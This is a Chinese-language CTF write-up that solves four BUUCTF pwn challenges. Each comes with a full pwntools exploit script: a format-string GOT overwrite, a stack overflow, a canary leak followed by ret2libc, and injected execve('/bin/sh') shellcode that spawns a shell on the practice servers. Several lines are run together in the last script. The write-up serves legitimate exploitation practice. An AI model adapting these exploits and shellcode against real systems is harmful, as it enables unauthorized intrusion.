PWN-PRACTICE-BUUCTF-15

- axb_2019_fmt32
- wustctf2020_getshell_2
- others_babystack
- pwnable_start

axb_2019_fmt32

格式化字符串漏洞
第一次打印出printf的真实地址，进而计算libc基地址，得到system真实地址
第二次修改got表，使printf的got指向system的真实地址，后面执行printf时实际上是执行system

from pwn import *
#p=process('./axb_2019_fmt32')
p = remote('node4.buuoj.cn',28123)
elf = ELF('./axb_2019_fmt32')
libc=ELF('./libc-2.23-x32.so')
printf_got=elf.got['printf']
print(hex(printf_got))
p.recvuntil('Please tell me:')
payload='%9$sa'+p32(printf_got)
p.sendline(payload)
p.recvuntil(':')
printf_addr=u32(p.recv(4))
print(hex(printf_addr))
libc_base=printf_addr-libc.symbols['printf']
system=libc_base+libc.symbols['system']
print(hex(system))
payload='aaaaa'+fmtstr_payload(9,{printf_got:system},write_size = "byte",numbwritten = 0xe)
p.sendline(payload)
p.sendline(';/bin/sh\x00')
p.interactive()

wustctf2020_getshell_2

栈溢出，可溢出12字节

from pwn import *
io=remote('node4.buuoj.cn',28982)
sh=0x08048670
syscall=0x08048529
payload='a'*(0x18+4)+p32(syscall)+p32(sh)
io.sendline(payload)
io.interactive()

others_babystack

先泄露canary，然后栈溢出ret2libc

from pwn import *
#context.log_level='debug'
#io=process('./others_babystack')
io=remote('node4.buuoj.cn',27674)
elf=ELF('./others_babystack')
libc=ELF('./libc-2.23-x64.so')
main_addr=0x400908
pop_rdi=0x400a93
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
io.sendafter('>> ','1')
payload='a'*(0x90-8-8)+'b'*8
io.sendline(payload)
io.sendafter('>> ','2')
io.recvuntil('bbbbbbbb\n')
canary=u64(io.recv(7).ljust(8,'\x00'))
canary=canary<<8
print(hex(canary))
payload='a'*(0x90-8)+p64(canary)+p64(0)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendafter('>> ','1')
io.sendline(payload)
io.sendafter('>> ','3')
puts_addr=u64(io.recv(6).ljust(8,'\x00'))
print(hex(puts_addr))
libc_base=puts_addr-libc.sym['puts']
system=libc_base+libc.sym['system']
binsh=libc_base+libc.search('/bin/sh\x00').next()
payload='a'*(0x90-8)+p64(canary)+p64(0)+p64(pop_rdi)+p64(binsh)+p64(system)+p64(main_addr)
io.sendafter('>> ','1')
io.sendline(payload)
io.sendafter('>> ','3')
io.interactive()

pwnable_start

参考：BUUCTF pwnable_start心路历程

from pwn import *
#context.log_level="debug"
context.os="linux"
context.arch="i386"
io=process("./start")
elf=ELF("./start")#.text:08048087                 mov     ecx, esp        ; addr
mov_ecx_esp=0x08048087#gdb.attach(io,"break * 0x0804809C")io.recvuntil("the CTF:")
payload="a"*0x14+p32(mov_ecx_esp)
io.send(payload)
leak_esp=u32(io.recv(4))
print(hex(leak_esp))#.text:08048099                 add     esp, 14h
#.text:0804809C                 retn
shellcode="\x31\xc9\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
payload="a"*0x14+p32(leak_esp+0x14)+shellcode
io.send(payload)io.interactive()